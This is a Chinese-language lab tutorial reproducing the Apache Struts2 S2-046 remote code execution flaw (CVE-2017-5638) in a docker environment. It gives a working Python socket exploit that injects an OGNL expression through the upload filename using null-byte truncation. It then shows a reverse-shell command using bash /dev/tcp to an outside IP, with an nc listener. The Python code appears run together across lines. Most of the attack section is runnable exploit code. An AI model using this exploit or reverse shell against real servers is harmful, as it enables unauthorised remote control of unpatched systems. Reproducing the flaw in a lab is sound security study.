S2-046 遠程代碼執行漏洞(CVE-2017-5638)

前言

使用Jakarta插件處理文件上傳操作時可能導致遠程代碼執行漏洞。

影響版本

Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10

漏洞環境

執行如下命令啓動struts2 2.3.30:

docker-compose up -d

訪問http://your-ip:8080即可看到上傳頁面。

漏洞復現

與s2-045類似,但是輸入點在文件上傳的filename值位置,並需要使用\x00截斷。

由於需要發送畸形數據包,我們簡單使用原生socket編寫payload:

import socket
q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b"Content-Type: text/plainfoo------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n')p = b'''POST / HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.8,es;q=0.6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2Content-Length: %d'''.replace(b'\n', b'\r\n') % (len(q), )
with socket.create_connection(('your-ip', '8080'), timeout=5) as conn:
    conn.send(p + q)
print(conn.recv(10240).decode())

修改your-IP即可直接運行

python3 1.py

233*233已成功執行

參考:https://github.com/mazen160/struts-pwn

我們試試反彈shell

python3 1.py --url 'http://192.168.111.129:8080' -c 'bash -i >& /dev/tcp/192.168.111.129/6767 0>&1’

監聽

nc -lvvp 6767

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章